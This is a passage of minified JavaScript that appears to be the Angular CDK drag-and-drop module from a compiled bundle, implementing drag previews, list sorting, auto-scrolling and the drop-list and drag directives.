zw(n.style,{"pointer-events":"none",margin:"0",position:"fixed",top:"0",left:"0","z-index":`${this._config.zIndex||1e3}`},Bw),W1(n,!1),n.classList.add("cdk-drag-preview"),n.setAttribute("dir",this._direction),e&&(Array.isArray(e)?e.forEach(r=>n.classList.add(r)):n.classList.add(e)),n}_animatePreviewToPlaceholder(){if(!this._hasMoved)return Promise.resolve();const a=this._placeholder.getBoundingClientRect();this._preview.classList.add("cdk-drag-animating"),this._applyPreviewTransform(a.left,a.top);const e=function mpe(t){const a=getComputedStyle(t),e=Ww(a,"transition-property"),i=e.find(d=>"transform"===d||"all"===d);if(!i)return 0;const n=e.indexOf(i),r=Ww(a,"transition-duration"),c=Ww(a,"transition-delay");return Xz(r[n])+Xz(c[n])}(this._preview);return 0===e?Promise.resolve():this._ngZone.runOutsideAngular(()=>new Promise(i=>{const n=c=>{var d;(!c||wd(c)===this._preview&&"transform"===c.propertyName)&&(null===(d=this._preview)||void 0===d||d.removeEventListener("transitionend",n),i(),clearTimeout(r))},r=setTimeout(n,1.5*e);this._preview.addEventListener("transitionend",n)}))}_createPlaceholderElement(){const a=this._placeholderTemplate,e=a?a.template:null;let i;return e?(this._placeholderRef=a.viewContainer.createEmbeddedView(e,a.context),this._placeholderRef.detectChanges(),i=oW(this._placeholderRef,this._document)):i=Zz(this._rootElement),i.style.pointerEvents="none",i.classList.add("cdk-drag-placeholder"),i}_getPointerPositionInElement(a,e,i){const n=e===this._rootElement?null:e,r=n?n.getBoundingClientRect():a,c=Jy(i)?i.targetTouches[0]:i,d=this._getViewportScrollPosition();return{x:r.left-a.left+(c.pageX-r.left-d.left),y:r.top-a.top+(c.pageY-r.top-d.top)}}_getPointerPositionOnPage(a){const e=this._getViewportScrollPosition(),i=Jy(a)?a.touches[0]||a.changedTouches[0]||{pageX:0,pageY:0}:a,n=i.pageX-e.left,r=i.pageY-e.top;if(this._ownerSVGElement){const c=this._ownerSVGElement.getScreenCTM();if(c){const d=this._ownerSVGElement.createSVGPoint();return d.x=n,d.y=r,d.matrixTransform(c.inverse())}}return{x:n,y:r}}_getConstrainedPointerPosition(a){const e=this._dropContainer?this._dropContainer.lockAxis:null;let{x:i,y:n}=this.constrainPosition?this.constrainPosition(a,this,this._initialClientRect,this._pickupPositionInElement):a;if("x"===this.lockAxis||"x"===e?n=this._pickupPositionOnPage.y:("y"===this.lockAxis||"y"===e)&&(i=this._pickupPositionOnPage.x),this._boundaryRect){const{x:r,y:c}=this._pickupPositionInElement,d=this._boundaryRect,{width:T,height:k}=this._getPreviewRect(),q=d.top+c,Y=d.bottom-(k-c);i=nW(i,d.left+r,d.right-(T-r)),n=nW(n,q,Y)}return{x:i,y:n}}_updatePointerDirectionDelta(a){const{x:e,y:i}=a,n=this._pointerDirectionDelta,r=this._pointerPositionAtLastDirectionChange,c=Math.abs(e-r.x),d=Math.abs(i-r.y);return c>this._config.pointerDirectionChangeThreshold&&(n.x=e>r.x?1:-1,r.x=e),d>this._config.pointerDirectionChangeThreshold&&(n.y=i>r.y?1:-1,r.y=i),n}_toggleNativeDragInteractions(){if(!this._rootElement||!this._handles)return;const a=this._handles.length>0||!this.isDragging();a!==this._nativeInteractionsEnabled&&(this._nativeInteractionsEnabled=a,W1(this._rootElement,a))}_removeRootElementListeners(a){a.removeEventListener("mousedown",this._pointerDown,H3),a.removeEventListener("touchstart",this._pointerDown,aW),a.removeEventListener("dragstart",this._nativeDragStart,H3)}_applyRootElementTransform(a,e){const i=U3(a,e),n=this._rootElement.style;null==this._initialTransform&&(this._initialTransform=n.transform&&"none"!=n.transform?n.transform:""),n.transform=B3(i,this._initialTransform)}_applyPreviewTransform(a,e){var i;const n=null!==(i=this._previewTemplate)&&void 0!==i&&i.template?void 0:this._initialTransform,r=U3(a,e);this._preview.style.transform=B3(r,n)}_getDragDistance(a){const e=this._pickupPositionOnPage;return e?{x:a.x-e.x,y:a.y-e.y}:{x:0,y:0}}_cleanupCachedDimensions(){this._boundaryRect=this._previewRect=void 0,this._parentPositions.clear()}_containInsideBoundaryOnResize(){let{x:a,y:e}=this._passiveTransform;if(0===a&&0===e||this.isDragging()||!this._boundaryElement)return;const i=this._rootElement.getBoundingClientRect(),n=this._boundaryElement.getBoundingClientRect();if(0===n.width&&0===n.height||0===i.width&&0===i.height)return;const r=n.left-i.left,c=i.right-n.right,d=n.top-i.top,T=i.bottom-n.bottom;n.width>i.width?(r>0&&(a+=r),c>0&&(a-=c)):a=0,n.height>i.height?(d>0&&(e+=d),T>0&&(e-=T)):e=0,(a!==this._passiveTransform.x||e!==this._passiveTransform.y)&&this.setFreeDragPosition({y:e,x:a})}_getDragStartDelay(a){const e=this.dragStartDelay;return"number"==typeof e?e:Jy(a)?e.touch:e?e.mouse:0}_updateOnScroll(a){const e=this._parentPositions.handleScroll(a);if(e){const i=wd(a);this._boundaryRect&&i!==this._boundaryElement&&i.contains(this._boundaryElement)&&Yy(this._boundaryRect,e.top,e.left),this._pickupPositionOnPage.x+=e.left,this._pickupPositionOnPage.y+=e.top,this._dropContainer||(this._activeTransform.x-=e.left,this._activeTransform.y-=e.top,this._applyRootElementTransform(this._activeTransform.x,this._activeTransform.y))}}_getViewportScrollPosition(){var a;return(null===(a=this._parentPositions.positions.get(this._document))||void 0===a?void 0:a.scrollPosition)||this._parentPositions.getViewportScrollPosition()}_getShadowRoot(){return void 0===this._cachedShadowRoot&&(this._cachedShadowRoot=_3(this._rootElement)),this._cachedShadowRoot}_getPreviewInsertionPoint(a,e){const i=this._previewContainer||"global";if("parent"===i)return a;if("global"===i){const n=this._document;return e||n.fullscreenElement||n.webkitFullscreenElement||n.mozFullScreenElement||n.msFullscreenElement||n.body}return Gr(i)}_getPreviewRect(){return(!this._previewRect||!this._previewRect.width&&!this._previewRect.height)&&(this._previewRect=this._preview?this._preview.getBoundingClientRect():this._initialClientRect),this._previewRect}_getTargetHandle(a){return this._handles.find(e=>a.target&&(a.target===e||e.contains(a.target)))}}function U3(t,a){return`translate3d(${Math.round(t)}px, ${Math.round(a)}px, 0)`}function nW(t,a,e){return Math.max(a,Math.min(e,t))}function Jy(t){return"t"===t.type[0]}function oW(t,a){const e=t.rootNodes;if(1===e.length&&e[0].nodeType===a.ELEMENT_NODE)return e[0];const i=a.createElement("div");return e.forEach(n=>i.appendChild(n)),i}function rW(t,a){t.style.width=`${a.width}px`,t.style.height=`${a.height}px`,t.style.transform=U3(a.left,a.top)}function Qs(t,a,e){const i=Zy(a,t.length-1),n=Zy(e,t.length-1);if(i===n)return;const r=t[i],c=n<i?-1:1;for(let d=i;d!==n;d+=c)t[d]=t[d+c];t[n]=r}function Zy(t,a){return Math.max(0,Math.min(a,t))}class ppe{constructor(a,e){this._element=a,this._dragDropRegistry=e,this._itemPositions=[],this.orientation="vertical",this._previousSwap={drag:null,delta:0,overlaps:!1}}start(a){this.withItems(a)}sort(a,e,i,n){const r=this._itemPositions,c=this._getItemIndexFromPointerPosition(a,e,i,n);if(-1===c&&r.length>0)return null;const d="horizontal"===this.orientation,T=r.findIndex(Ne=>Ne.drag===a),k=r[c],Y=k.clientRect,te=T>c?1:-1,pe=this._getItemOffsetPx(r[T].clientRect,Y,te),Re=this._getSiblingOffsetPx(T,r,te),Fe=r.slice();return Qs(r,T,c),r.forEach((Ne,et)=>{if(Fe[et]===Ne)return;const ut=Ne.drag===a,Ze=ut?pe:Re,yt=ut?a.getPlaceholderElement():Ne.drag.getRootElement();Ne.offset+=Ze,d?(yt.style.transform=B3(`translate3d(${Math.round(Ne.offset)}px, 0, 0)`,Ne.initialTransform),Yy(Ne.clientRect,0,Ze)):(yt.style.transform=B3(`translate3d(0, ${Math.round(Ne.offset)}px, 0)`,Ne.initialTransform),Yy(Ne.clientRect,Ze,0))}),this._previousSwap.overlaps=Vw(Y,e,i),this._previousSwap.drag=k.drag,this._previousSwap.delta=d?n.x:n.y,{previousIndex:T,currentIndex:c}}enter(a,e,i,n){const r=null==n||n<0?this._getItemIndexFromPointerPosition(a,e,i):n,c=this._activeDraggables,d=c.indexOf(a),T=a.getPlaceholderElement();let k=c[r];if(k===a&&(k=c[r+1]),!k&&(null==r||-1===r||r<c.length-1)&&this._shouldEnterAsFirstChild(e,i)&&(k=c[0]),d>-1&&c.splice(d,1),k&&!this._dragDropRegistry.isDragging(k)){const q=k.getRootElement();q.parentElement.insertBefore(T,q),c.splice(r,0,a)}else Gr(this._element).appendChild(T),c.push(a);T.style.transform="",this._cacheItemPositions()}withItems(a){this._activeDraggables=a.slice(),this._cacheItemPositions()}withSortPredicate(a){this._sortPredicate=a}reset(){this._activeDraggables.forEach(a=>{var e;const i=a.getRootElement();if(i){const n=null===(e=this._itemPositions.find(r=>r.drag===a))||void 0===e?void 0:e.initialTransform;i.style.transform=n||""}}),this._itemPositions=[],this._activeDraggables=[],this._previousSwap.drag=null,this._previousSwap.delta=0,this._previousSwap.overlaps=!1}getActiveItemsSnapshot(){return this._activeDraggables}getItemIndex(a){return("horizontal"===this.orientation&&"rtl"===this.direction?this._itemPositions.slice().reverse():this._itemPositions).findIndex(i=>i.drag===a)}updateOnScroll(a,e){this._itemPositions.forEach(({clientRect:i})=>{Yy(i,a,e)}),this._itemPositions.forEach(({drag:i})=>{this._dragDropRegistry.isDragging(i)&&i._sortFromLastPointerPosition()})}_cacheItemPositions(){const a="horizontal"===this.orientation;this._itemPositions=this._activeDraggables.map(e=>{const i=e.getVisibleElement();return{drag:e,offset:0,initialTransform:i.style.transform||"",clientRect:Fw(i)}}).sort((e,i)=>a?e.clientRect.left-i.clientRect.left:e.clientRect.top-i.clientRect.top)}_getItemOffsetPx(a,e,i){const n="horizontal"===this.orientation;let r=n?e.left-a.left:e.top-a.top;return-1===i&&(r+=n?e.width-a.width:e.height-a.height),r}_getSiblingOffsetPx(a,e,i){const n="horizontal"===this.orientation,r=e[a].clientRect,c=e[a+-1*i];let d=r[n?"width":"height"]*i;if(c){const T=n?"left":"top",k=n?"right":"bottom";-1===i?d-=c.clientRect[T]-r[k]:d+=r[T]-c.clientRect[k]}return d}_shouldEnterAsFirstChild(a,e){if(!this._activeDraggables.length)return!1;const i=this._itemPositions,n="horizontal"===this.orientation;if(i[0].drag!==this._activeDraggables[0]){const c=i[i.length-1].clientRect;return n?a>=c.right:e>=c.bottom}{const c=i[0].clientRect;return n?a<=c.left:e<=c.top}}_getItemIndexFromPointerPosition(a,e,i,n){const r="horizontal"===this.orientation,c=this._itemPositions.findIndex(({drag:d,clientRect:T})=>{if(d===a)return!1;if(n){const k=r?n.x:n.y;if(d===this._previousSwap.drag&&this._previousSwap.overlaps&&k===this._previousSwap.delta)return!1}return r?e>=Math.floor(T.left)&&e<Math.floor(T.right):i>=Math.floor(T.top)&&i<Math.floor(T.bottom)});return-1!==c&&this._sortPredicate(c,a)?c:-1}}class _pe{constructor(a,e,i,n,r){this._dragDropRegistry=e,this._ngZone=n,this._viewportRuler=r,this.disabled=!1,this.sortingDisabled=!1,this.autoScrollDisabled=!1,this.autoScrollStep=2,this.enterPredicate=()=>!0,this.sortPredicate=()=>!0,this.beforeStarted=new J,this.entered=new J,this.exited=new J,this.dropped=new J,this.sorted=new J,this._isDragging=!1,this._draggables=[],this._siblings=[],this._activeSiblings=new Set,this._viewportScrollSubscription=I.EMPTY,this._verticalScrollDirection=0,this._horizontalScrollDirection=0,this._stopScrollTimers=new J,this._cachedShadowRoot=null,this._startScrollInterval=()=>{this._stopScrolling(),$z(0,Az).pipe(ea(this._stopScrollTimers)).subscribe(()=>{const c=this._scrollNode,d=this.autoScrollStep;1===this._verticalScrollDirection?c.scrollBy(0,-d):2===this._verticalScrollDirection&&c.scrollBy(0,d),1===this._horizontalScrollDirection?c.scrollBy(-d,0):2===this._horizontalScrollDirection&&c.scrollBy(d,0)})},this.element=Gr(a),this._document=i,this.withScrollableParents([this.element]),e.registerDropContainer(this),this._parentPositions=new Jz(i),this._sortStrategy=new ppe(this.element,e),this._sortStrategy.withSortPredicate((c,d)=>this.sortPredicate(c,d,this))}dispose(){this._stopScrolling(),this._stopScrollTimers.complete(),this._viewportScrollSubscription.unsubscribe(),this.beforeStarted.complete(),this.entered.complete(),this.exited.complete(),this.dropped.complete(),this.sorted.complete(),this._activeSiblings.clear(),this._scrollNode=null,this._parentPositions.clear(),this._dragDropRegistry.removeDropContainer(this)}isDragging(){return this._isDragging}start(){this._draggingStarted(),this._notifyReceivingSiblings()}enter(a,e,i,n){this._draggingStarted(),null==n&&this.sortingDisabled&&(n=this._draggables.indexOf(a)),this._sortStrategy.enter(a,e,i,n),this._cacheParentPositions(),this._notifyReceivingSiblings(),this.entered.next({item:a,container:this,currentIndex:this.getItemIndex(a)})}exit(a){this._reset(),this.exited.next({item:a,container:this})}drop(a,e,i,n,r,c,d,T={}){this._reset(),this.dropped.next({item:a,currentIndex:e,previousIndex:i,container:this,previousContainer:n,isPointerOverContainer:r,distance:c,dropPoint:d,event:T})}withItems(a){const e=this._draggables;return this._draggables=a,a.forEach(i=>i._withDropContainer(this)),this.isDragging()&&(e.filter(n=>n.isDragging()).every(n=>-1===a.indexOf(n))?this._reset():this._sortStrategy.withItems(this._draggables)),this}withDirection(a){return this._sortStrategy.direction=a,this}connectedTo(a){return this._siblings=a.slice(),this}withOrientation(a){return this._sortStrategy.orientation=a,this}withScrollableParents(a){const e=Gr(this.element);return this._scrollableElements=-1===a.indexOf(e)?[e,...a]:a.slice(),this}getScrollableParents(){return this._scrollableElements}getItemIndex(a){return this._isDragging?this._sortStrategy.getItemIndex(a):this._draggables.indexOf(a)}isReceiving(){return this._activeSiblings.size>0}_sortItem(a,e,i,n){if(this.sortingDisabled||!this._clientRect||!Yz(this._clientRect,.05,e,i))return;const r=this._sortStrategy.sort(a,e,i,n);r&&this.sorted.next({previousIndex:r.previousIndex,currentIndex:r.currentIndex,container:this,item:a})}_startScrollingIfNecessary(a,e){if(this.autoScrollDisabled)return;let i,n=0,r=0;if(this._parentPositions.positions.forEach((c,d)=>{d===this._document||!c.clientRect||i||Yz(c.clientRect,.05,a,e)&&([n,r]=function gpe(t,a,e,i){const n=lW(a,i),r=dW(a,e);let c=0,d=0;if(n){const T=t.scrollTop;1===n?T>0&&(c=1):t.scrollHeight-T>t.clientHeight&&(c=2)}if(r){const T=t.scrollLeft;1===r?T>0&&(d=1):t.scrollWidth-T>t.clientWidth&&(d=2)}return[c,d]}(d,c.clientRect,a,e),(n||r)&&(i=d))}),!n&&!r){const{width:c,height:d}=this._viewportRuler.getViewportSize(),T={width:c,height:d,top:0,right:c,bottom:d,left:0};n=lW(T,e),r=dW(T,a),i=window}i&&(n!==this._verticalScrollDirection||r!==this._horizontalScrollDirection||i!==this._scrollNode)&&(this._verticalScrollDirection=n,this._horizontalScrollDirection=r,this._scrollNode=i,(n||r)&&i?this._ngZone.runOutsideAngular(this._startScrollInterval):this._stopScrolling())}_stopScrolling(){this._stopScrollTimers.next()}_draggingStarted(){const a=Gr(this.element).style;this.beforeStarted.next(),this._isDragging=!0,this._initialScrollSnap=a.msScrollSnapType||a.scrollSnapType||"",a.scrollSnapType=a.msScrollSnapType="none",this._sortStrategy.start(this._draggables),this._cacheParentPositions(),this._viewportScrollSubscription.unsubscribe(),this._listenToScrollEvents()}_cacheParentPositions(){const a=Gr(this.element);this._parentPositions.cache(this._scrollableElements),this._clientRect=this._parentPositions.positions.get(a).clientRect}_reset(){this._isDragging=!1;const a=Gr(this.element).style;a.scrollSnapType=a.msScrollSnapType=this._initialScrollSnap,this._siblings.forEach(e=>e._stopReceiving(this)),this._sortStrategy.reset(),this._stopScrolling(),this._viewportScrollSubscription.unsubscribe(),this._parentPositions.clear()}_isOverContainer(a,e){return null!=this._clientRect&&Vw(this._clientRect,a,e)}_getSiblingContainerFromPosition(a,e,i){return this._siblings.find(n=>n._canReceive(a,e,i))}_canReceive(a,e,i){if(!this._clientRect||!Vw(this._clientRect,e,i)||!this.enterPredicate(a,this))return!1;const n=this._getShadowRoot().elementFromPoint(e,i);if(!n)return!1;const r=Gr(this.element);return n===r||r.contains(n)}_startReceiving(a,e){const i=this._activeSiblings;!i.has(a)&&e.every(n=>this.enterPredicate(n,this)||this._draggables.indexOf(n)>-1)&&(i.add(a),this._cacheParentPositions(),this._listenToScrollEvents())}_stopReceiving(a){this._activeSiblings.delete(a),this._viewportScrollSubscription.unsubscribe()}_listenToScrollEvents(){this._viewportScrollSubscription=this._dragDropRegistry.scrolled(this._getShadowRoot()).subscribe(a=>{if(this.isDragging()){const e=this._parentPositions.handleScroll(a);e&&this._sortStrategy.updateOnScroll(e.top,e.left)}else this.isReceiving()&&this._cacheParentPositions()})}_getShadowRoot(){if(!this._cachedShadowRoot){const a=_3(Gr(this.element));this._cachedShadowRoot=a||this._document}return this._cachedShadowRoot}_notifyReceivingSiblings(){const a=this._sortStrategy.getActiveItemsSnapshot().filter(e=>e.isDragging());this._siblings.forEach(e=>e._startReceiving(this,a))}}function lW(t,a){const{top:e,bottom:i,height:n}=t,r=.05*n;return a>=e-r&&a<=e+r?1:a>=i-r&&a<=i+r?2:0}function dW(t,a){const{left:e,right:i,width:n}=t,r=.05*n;return a>=e-r&&a<=e+r?1:a>=i-r&&a<=i+r?2:0}const q3=ym({passive:!1,capture:!0});let Cpe=(()=>{class t{constructor(e,i){this._ngZone=e,this._dropInstances=new Set,this._dragInstances=new Set,this._activeDragInstances=[],this._globalListeners=new Map,this._draggingPredicate=n=>n.isDragging(),this.pointerMove=new J,this.pointerUp=new J,this.scroll=new J,this._preventDefaultWhileDragging=n=>{this._activeDragInstances.length>0&&n.preventDefault()},this._persistentTouchmoveListener=n=>{this._activeDragInstances.length>0&&(this._activeDragInstances.some(this._draggingPredicate)&&n.preventDefault(),this.pointerMove.next(n))},this._document=i}registerDropContainer(e){this._dropInstances.has(e)||this._dropInstances.add(e)}registerDragItem(e){this._dragInstances.add(e),1===this._dragInstances.size&&this._ngZone.runOutsideAngular(()=>{this._document.addEventListener("touchmove",this._persistentTouchmoveListener,q3)})}removeDropContainer(e){this._dropInstances.delete(e)}removeDragItem(e){this._dragInstances.delete(e),this.stopDragging(e),0===this._dragInstances.size&&this._document.removeEventListener("touchmove",this._persistentTouchmoveListener,q3)}startDragging(e,i){if(!(this._activeDragInstances.indexOf(e)>-1)&&(this._activeDragInstances.push(e),1===this._activeDragInstances.length)){const n=i.type.startsWith("touch");this._globalListeners.set(n?"touchend":"mouseup",{handler:r=>this.pointerUp.next(r),options:!0}).set("scroll",{handler:r=>this.scroll.next(r),options:!0}).set("selectstart",{handler:this._preventDefaultWhileDragging,options:q3}),n||this._globalListeners.set("mousemove",{handler:r=>this.pointerMove.next(r),options:q3}),this._ngZone.runOutsideAngular(()=>{this._globalListeners.forEach((r,c)=>{this._document.addEventListener(c,r.handler,r.options)})})}}stopDragging(e){const i=this._activeDragInstances.indexOf(e);i>-1&&(this._activeDragInstances.splice(i,1),0===this._activeDragInstances.length&&this._clearGlobalListeners())}isDragging(e){return this._activeDragInstances.indexOf(e)>-1}scrolled(e){const i=[this.scroll];return e&&e!==this._document&&i.push(new G(n=>this._ngZone.runOutsideAngular(()=>{const c=d=>{this._activeDragInstances.length&&n.next(d)};return e.addEventListener("scroll",c,!0),()=>{e.removeEventListener("scroll",c,!0)}}))),ra(...i)}ngOnDestroy(){this._dragInstances.forEach(e=>this.removeDragItem(e)),this._dropInstances.forEach(e=>this.removeDropContainer(e)),this._clearGlobalListeners(),this.pointerMove.complete(),this.pointerUp.complete()}_clearGlobalListeners(){this._globalListeners.forEach((e,i)=>{this._document.removeEventListener(i,e.handler,e.options)}),this._globalListeners.clear()}}return t.\u0275fac=function(e){return new(e||t)(At(qi),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const ype={dragStartThreshold:5,pointerDirectionChangeThreshold:5};let Hw=(()=>{class t{constructor(e,i,n,r){this._document=e,this._ngZone=i,this._viewportRuler=n,this._dragDropRegistry=r}createDrag(e,i=ype){return new fpe(e,i,this._document,this._ngZone,this._viewportRuler,this._dragDropRegistry)}createDropList(e){return new _pe(e,this._dragDropRegistry,this._document,this._ngZone,this._viewportRuler)}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(qi),At(bm),At(Cpe))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const mW=new ni("CDK_DRAG_PARENT"),uW=new ni("CdkDropListGroup"),hW=new ni("CDK_DRAG_CONFIG");let bpe=0;const fW=new ni("CdkDropList");let Rd=(()=>{class t{constructor(e,i,n,r,c,d,T){this.element=e,this._changeDetectorRef=n,this._scrollDispatcher=r,this._dir=c,this._group=d,this._destroyed=new J,this.connectedTo=[],this.id="cdk-drop-list-"+bpe++,this.enterPredicate=()=>!0,this.sortPredicate=()=>!0,this.dropped=new Tt,this.entered=new Tt,this.exited=new Tt,this.sorted=new Tt,this._unsortedItems=new Set,this._dropListRef=i.createDropList(e),this._dropListRef.data=this,T&&this._assignDefaults(T),this._dropListRef.enterPredicate=(k,q)=>this.enterPredicate(k.data,q.data),this._dropListRef.sortPredicate=(k,q,Y)=>this.sortPredicate(k,q.data,Y.data),this._setupInputSyncSubscription(this._dropListRef),this._handleEvents(this._dropListRef),t._dropLists.push(this),d&&d._items.add(this)}get disabled(){return this._disabled||!!this._group&&this._group.disabled}set disabled(e){this._dropListRef.disabled=this._disabled=wi(e)}addItem(e){this._unsortedItems.add(e),this._dropListRef.isDragging()&&this._syncItemsWithRef()}removeItem(e){this._unsortedItems.delete(e),this._dropListRef.isDragging()&&this._syncItemsWithRef()}getSortedItems(){return Array.from(this._unsortedItems).sort((e,i)=>e._dragRef.getVisibleElement().compareDocumentPosition(i._dragRef.getVisibleElement())&Node.DOCUMENT_POSITION_FOLLOWING?-1:1)}ngOnDestroy(){const e=t._dropLists.indexOf(this);e>-1&&t._dropLists.splice(e,1),this._group&&this._group._items.delete(this),this._unsortedItems.clear(),this._dropListRef.dispose(),this._destroyed.next(),this._destroyed.complete()}_setupInputSyncSubscription(e){this._dir&&this._dir.change.pipe(Ro(this._dir.value),ea(this._destroyed)).subscribe(i=>e.withDirection(i)),e.beforeStarted.subscribe(()=>{const i=Oy(this.connectedTo).map(n=>"string"==typeof n?t._dropLists.find(c=>c.id===n):n);if(this._group&&this._group._items.forEach(n=>{-1===i.indexOf(n)&&i.push(n)}),!this._scrollableParentsResolved){const n=this._scrollDispatcher.getAncestorScrollContainers(this.element).map(r=>r.getElementRef().nativeElement);this._dropListRef.withScrollableParents(n),this._scrollableParentsResolved=!0}e.disabled=this.disabled,e.lockAxis=this.lockAxis,e.sortingDisabled=wi(this.sortingDisabled),e.autoScrollDisabled=wi(this.autoScrollDisabled),e.autoScrollStep=Uo(this.autoScrollStep,2),e.connectedTo(i.filter(n=>n&&n!==this).map(n=>n._dropListRef)).withOrientation(this.orientation)})}_handleEvents(e){e.beforeStarted.subscribe(()=>{this._syncItemsWithRef(),this._changeDetectorRef.markForCheck()}),e.entered.subscribe(i=>{this.entered.emit({container:this,item:i.item.data,currentIndex:i.currentIndex})}),e.exited.subscribe(i=>{this.exited.emit({container:this,item:i.item.data}),this._changeDetectorRef.markForCheck()}),e.sorted.subscribe(i=>{this.sorted.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,container:this,item:i.item.data})}),e.dropped.subscribe(i=>{this.dropped.emit({previousIndex:i.previousIndex,currentIndex:i.currentIndex,previousContainer:i.previousContainer.data,container:i.container.data,item:i.item.data,isPointerOverContainer:i.isPointerOverContainer,distance:i.distance,dropPoint:i.dropPoint,event:i.event}),this._changeDetectorRef.markForCheck()})}_assignDefaults(e){const{lockAxis:i,draggingDisabled:n,sortingDisabled:r,listAutoScrollDisabled:c,listOrientation:d}=e;this.disabled=null!=n&&n,this.sortingDisabled=null!=r&&r,this.autoScrollDisabled=null!=c&&c,this.orientation=d||"vertical",i&&(this.lockAxis=i)}_syncItemsWithRef(){this._dropListRef.withItems(this.getSortedItems().map(e=>e._dragRef))}}return t._dropLists=[],t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(Hw),Ee(Ma),Ee(By),Ee(Cr,8),Ee(uW,12),Ee(hW,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkDropList",""],["cdk-drop-list"]],hostAttrs:[1,"cdk-drop-list"],hostVars:7,hostBindings:function(e,i){2&e&&(Rt("id",i.id),Ct("cdk-drop-list-disabled",i.disabled)("cdk-drop-list-dragging",i._dropListRef.isDragging())("cdk-drop-list-receiving",i._dropListRef.isReceiving()))},inputs:{connectedTo:["cdkDropListConnectedTo","connectedTo"],data:["cdkDropListData","data"],orientation:["cdkDropListOrientation","orientation"],id:"id",lockAxis:["cdkDropListLockAxis","lockAxis"],disabled:["cdkDropListDisabled","disabled"],sortingDisabled:["cdkDropListSortingDisabled","sortingDisabled"],enterPredicate:["cdkDropListEnterPredicate","enterPredicate"],sortPredicate:["cdkDropListSortPredicate","sortPredicate"],autoScrollDisabled:["cdkDropListAutoScrollDisabled","autoScrollDisabled"],autoScrollStep:["cdkDropListAutoScrollStep","autoScrollStep"]},outputs:{dropped:"cdkDropListDropped",entered:"cdkDropListEntered",exited:"cdkDropListExited",sorted:"cdkDropListSorted"},exportAs:["cdkDropList"],features:[ki([{provide:uW,useValue:void 0},{provide:fW,useExisting:t}])]}),t})();const pW=new ni("CdkDragHandle"),Mpe=new ni("CdkDragPlaceholder"),vpe=new ni("CdkDragPreview");let Sd=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){this.element=e,this.dropContainer=i,this._ngZone=r,this._viewContainerRef=c,this._dir=T,this._changeDetectorRef=q,this._selfHandle=Y,this._parentDrag=te,this._destroyed=new J,this.started=new Tt,this.released=new Tt,this.ended=new Tt,this.entered=new Tt,this.exited=new Tt,this.dropped=new Tt,this.moved=new G(pe=>{const Re=this._dragRef.moved.pipe(Xe(Fe=>({source:this,pointerPosition:Fe.pointerPosition,event:Fe.event,delta:Fe.delta,distance:Fe.distance}))).subscribe(pe);return()=>{Re.unsubscribe()}}),this._dragRef=k.createDrag(e,{dragStartThreshold:d&&null!=d.dragStartThreshold?d.dragStartThreshold:5,pointerDirectionChangeThreshold:d&&null!=d.pointerDirectionChangeThreshold?d.pointerDirectionChangeThreshold:5,zIndex:null==d?void 0:d.zIndex}),this._dragRef.data=this,t._dragInstances.push(this),d&&this._assignDefaults(d),i&&(this._dragRef._withDropContainer(i._dropListRef),i.addItem(this)),this._syncInputs(this._dragRef),this._handleEvents(this._dragRef)}get disabled(){return this._disabled||this.dropContainer&&this.dropContainer.disabled}set disabled(e){this._disabled=wi(e),this._dragRef.disabled=this._disabled}getPlaceholderElement(){return this._dragRef.getPlaceholderElement()}getRootElement(){return this._dragRef.getRootElement()}reset(){this._dragRef.reset()}getFreeDragPosition(){return this._dragRef.getFreeDragPosition()}setFreeDragPosition(e){this._dragRef.setFreeDragPosition(e)}ngAfterViewInit(){this._ngZone.runOutsideAngular(()=>{this._ngZone.onStable.pipe(Cn(1),ea(this._destroyed)).subscribe(()=>{this._updateRootElement(),this._setupHandlesListener(),this.freeDragPosition&&this._dragRef.setFreeDragPosition(this.freeDragPosition)})})}ngOnChanges(e){const i=e.rootElementSelector,n=e.freeDragPosition;i&&!i.firstChange&&this._updateRootElement(),n&&!n.firstChange&&this.freeDragPosition&&this._dragRef.setFreeDragPosition(this.freeDragPosition)}ngOnDestroy(){this.dropContainer&&this.dropContainer.removeItem(this);const e=t._dragInstances.indexOf(this);e>-1&&t._dragInstances.splice(e,1),this._ngZone.runOutsideAngular(()=>{this._destroyed.next(),this._destroyed.complete(),this._dragRef.dispose()})}_updateRootElement(){var e;const i=this.element.nativeElement;let n=i;this.rootElementSelector&&(n=void 0!==i.closest?i.closest(this.rootElementSelector):null===(e=i.parentElement)||void 0===e?void 0:e.closest(this.rootElementSelector)),this._dragRef.withRootElement(n||i)}_getBoundaryElement(){const e=this.boundaryElement;return e?"string"==typeof e?this.element.nativeElement.closest(e):Gr(e):null}_syncInputs(e){e.beforeStarted.subscribe(()=>{if(!e.isDragging()){const i=this._dir,n=this.dragStartDelay,r=this._placeholderTemplate?{template:this._placeholderTemplate.templateRef,context:this._placeholderTemplate.data,viewContainer:this._viewContainerRef}:null,c=this._previewTemplate?{template:this._previewTemplate.templateRef,context:this._previewTemplate.data,matchSize:this._previewTemplate.matchSize,viewContainer:this._viewContainerRef}:null;e.disabled=this.disabled,e.lockAxis=this.lockAxis,e.dragStartDelay="object"==typeof n&&n?n:Uo(n),e.constrainPosition=this.constrainPosition,e.previewClass=this.previewClass,e.withBoundaryElement(this._getBoundaryElement()).withPlaceholderTemplate(r).withPreviewTemplate(c).withPreviewContainer(this.previewContainer||"global"),i&&e.withDirection(i.value)}}),e.beforeStarted.pipe(Cn(1)).subscribe(()=>{var i;if(this._parentDrag)return void e.withParent(this._parentDrag._dragRef);let n=this.element.nativeElement.parentElement;for(;n;){if(n.classList.contains("cdk-drag")){e.withParent((null===(i=t._dragInstances.find(r=>r.element.nativeElement===n))||void 0===i?void 